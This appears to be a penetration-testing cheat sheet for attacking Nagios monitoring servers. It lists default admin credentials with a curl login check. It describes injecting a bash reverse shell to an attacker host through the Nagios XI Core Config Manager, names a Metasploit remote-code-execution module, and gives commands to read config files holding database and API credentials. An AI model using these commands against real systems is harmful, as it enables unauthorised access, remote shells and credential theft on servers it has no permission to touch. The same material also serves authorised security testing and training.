Nagios

What it is: Open-source IT infrastructure monitoring system. Web interface for viewing host/service status. Authenticated users can often execute commands through the CGI interface, and multiple RCE CVEs exist.

Default ports: 80, 443 (path: /nagios or /nagiosxi)

Vuln research:


Default credentials

Try before anything else — Often unchanged

# Nagios Core: nagiosadmin:nagiosadmin
# Nagios XI: nagiosadmin:PASSW0RD
curl -u nagiosadmin:nagiosadmin http://$IP/nagios/

Nagios XI authenticated RCE

Command injection via admin panel — Multiple vectors

# Nagios XI < 5.6.6: Authenticated RCE
# Admin → Configure → Core Config Manager → Commands
# Create command with injected shell:
# Command Line: /bin/bash -c 'bash -i >& /dev/tcp/$LHOST/4444 0>&1'

# Or use Metasploit:
use exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce

Read Nagios config for creds

Configuration files contain database and API credentials

cat /usr/local/nagiosxi/html/config.inc.php
cat /usr/local/nagios/etc/resource.cfg
# Contains $USER1$ macro paths and potentially credentials